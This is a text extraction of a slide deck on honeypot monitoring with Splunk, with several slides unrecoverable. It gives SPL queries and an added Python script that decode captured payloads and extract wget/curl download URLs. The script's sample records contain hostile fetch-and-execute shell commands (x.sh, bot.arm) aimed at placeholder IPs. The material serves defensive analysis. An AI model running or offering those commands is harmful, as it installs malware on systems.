Honeypot Monitoring with Splunk (Splunkによるハニーポット監視.pdf)
by sec-chick
Slide 1: Honeypot Monitoring with Splunk (sec-chick)
Slide 2: WHO AM I
• sec-chick (@one_sec_chick)
• PSOC
• Runs honeypots (WoW Honeypot, Honeytrap)
Slide 3: (no text extracted)
Slide 4: Setup diagram; labels: Splunk, WoWHoneypot, Honeytrap, PC, VPS, SSH
• Splunk
Slide 5: SPLUNK
• (bullet text not recoverable)
• Reference: http://www.intellilink.co.jp/pd/products/package/security/splunk.html
Slide 6: WoWHoneypot
Slide 7: Honeytrap
Slide 8: Steps (only the keywords survived extraction)
1. SSH
2. Splunk
3. Splunk
4. (not recoverable)
5. HEX
Slide 9: attack_connection.local_port
Slide 10: attack_connection.payload.data_hex (Hex → decoded)
Slide 11: (no text extracted)
Slide 12: 1. Docker 2. (not recoverable) 3. Splunk 4. Suricata
Slide 13: DOCKER
• (bullet text not recoverable; mentions Docker)
Slide 14: • Docker • cron
Diagram labels: Splunk, WoWHoneypot, Honeytrap, VPS, Honeypot, Docker
Slide 15: Diagram labels: Splunk, WoWHoneypot, Honeytrap, VPS, Honeypot, Docker
Slide 16: SPLUNK
• (bullet text not recoverable)
• Extract the URLs from the decoded payloads → look them up on VirusTotal
Slide 17: WOWHONEYPOT
| rex field=_raw "\"(?<f1>[^\s]+)\s(?<f2>[^\s]+)\s([^\s]+)\s([^\s]+)\s([^\s]+)\s(?<base64_wow>.*$)"
| decrypt field="base64_wow" atob emit('base64_wow_decrypted')
| eval decode=urldecode(base64_wow_decrypted)
| rex field="decode" "wget.+(?<url>https?://[\w/:\.\-]+?)\s"
| rex field="decode" "curl.+(?<url>https?://[\w/:\.\-]+?)\s"
(The ¥ characters in the extracted PDF text are the Yen-sign rendering of backslash. The names of the first two capture groups and of the URL group were lost in extraction; f1, f2 and url are placeholders. The base64 payload is decoded with the Decrypt app, URL-decoded, and then searched for wget/curl download URLs.)
Slide 18: HONEYTRAP
| decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted')
| rex field="attack_connection.payload.data_decrypted" "wget.+(?<url>https?://[\w/:\.\-]+?)\s"
| rex field="attack_connection.payload.data_decrypted" "curl.+(?<url>https?://[\w/:\.\-]+?)\s"
(Same as slide 17, but the captured payload is hex-encoded, so it is unhexed instead of base64-decoded; the url group name is a placeholder for the name lost in extraction.)
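The two SPL pipelines on slides 17 and 18 can be replayed offline. The Python below is an added example, not code from the slides or from the WoWHoneypot or Honeytrap projects: it performs the same base64 → urldecode step for a WoWHoneypot line and the same unhex step for a Honeytrap event, then extracts wget/curl download URLs with the slides' character class. The sample records are constructed; the six-field line shape, the nested Honeytrap JSON layout (Splunk flattens it to the dotted field names on the slides) and the field names f1/f2 are assumptions, since the original capture-group names were lost in extraction.

```python
import base64
import binascii
import json
import re
from urllib.parse import unquote

# Constructed sample data, not real captures. Addresses are from the
# RFC 5737 documentation ranges.
WOW_REQUEST = (
    "GET /shell?cd%20/tmp;wget%20http://203.0.113.7/x.sh;sh%20x.sh HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\nUser-Agent: curl/7.48.0\r\n\r\n"
)
# Six whitespace-separated fields with base64 last: the shape the slide's
# rex expects. The real WoWHoneypot line layout may differ (assumption).
SAMPLE_WOW_LINE = (
    "2018-03-10T12:00:00+0900 203.0.113.5 192.0.2.10:8080 honeypot.example "
    "20170803-0001 " + base64.b64encode(WOW_REQUEST.encode()).decode()
)
HT_PAYLOAD = b"cd /tmp; curl -O http://198.51.100.9/bot.arm; chmod +x bot.arm; ./bot.arm\n"
# Assumed nested JSON layout; Splunk flattens it to attack_connection.payload.data_hex.
SAMPLE_HT_EVENT = json.dumps({
    "attack_connection": {
        "local_ip": "192.0.2.10", "local_port": 23,
        "remote_ip": "203.0.113.77", "remote_port": 51234,
        "payload": {"length": len(HT_PAYLOAD), "data_hex": HT_PAYLOAD.hex()},
    }
})

# Mirrors the slide's rex: two named fields, three unnamed, then the base64
# blob. f1/f2 are placeholders for the group names lost in extraction.
WOW_LINE_RE = re.compile(r"^(?P<f1>\S+)\s(?P<f2>\S+)\s\S+\s\S+\s\S+\s(?P<base64_wow>\S+)$")

# Download URL following wget/curl on the same line, using the slides'
# character class. \b keeps "curl" from matching inside other words and the
# non-greedy [^\r\n]*? keeps the match on one line, so a
# "User-Agent: curl/..." header does not pull in a URL from a later line.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b[^\r\n]*?(https?://[\w/:.\-]+)")


def extract_download_urls(text):
    """Return unique wget/curl download URLs in order of appearance."""
    urls = []
    for m in DOWNLOAD_RE.finditer(text):
        if m.group(1) not in urls:
            urls.append(m.group(1))
    return urls


def parse_wowhoneypot_line(line):
    """base64 -> urldecode -> URL extraction, as the slide 17 SPL does.

    Returns None when the line does not have the expected shape or the base64
    is malformed, so one bad line does not abort a batch."""
    m = WOW_LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group("base64_wow"), validate=True)
    except binascii.Error:
        return None
    request = unquote(raw.decode("utf-8", errors="replace"))
    return {"f1": m.group("f1"), "f2": m.group("f2"),
            "request": request, "urls": extract_download_urls(request)}


def parse_honeytrap_event(json_line):
    """unhex the captured payload and extract URLs, as the slide 18 SPL does."""
    conn = json.loads(json_line)["attack_connection"]
    try:
        payload = bytes.fromhex(conn["payload"]["data_hex"])
    except ValueError:
        return None  # malformed hex: skip the event instead of crashing
    text = payload.decode("utf-8", errors="replace")
    return {"local_port": conn["local_port"], "remote_ip": conn.get("remote_ip"),
            "payload_text": text, "urls": extract_download_urls(text)}


if __name__ == "__main__":
    print(parse_wowhoneypot_line(SAMPLE_WOW_LINE))
    print(parse_honeytrap_event(SAMPLE_HT_EVENT))
```

The extracted URLs are what slide 16 feeds to VirusTotal; the lookup itself is left out here because it needs network access and an API key. Decoding with errors="replace" matters in practice: Honeytrap payloads are often raw binary protocol data rather than shell commands, and a strict decode would discard the whole event.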
Slide 19: HONEYTRAP (screenshot)
Slide 20: SURICATA
• Grep (bullet text not recoverable)
• (bullet text not recoverable)
• Suricata (bullet text not recoverable)
Slide 21: Acknowledgements
• @Sec_S_Owl
• @cactus_pots
• @SugitaMuchi
• @soji256
• @morihi_soc
(Twitter, Slack) http://goo.gl/8bLkZA
Slide 22: (no text extracted)
Slide 23: Summary
• Splunk (remaining bullet text not recoverable)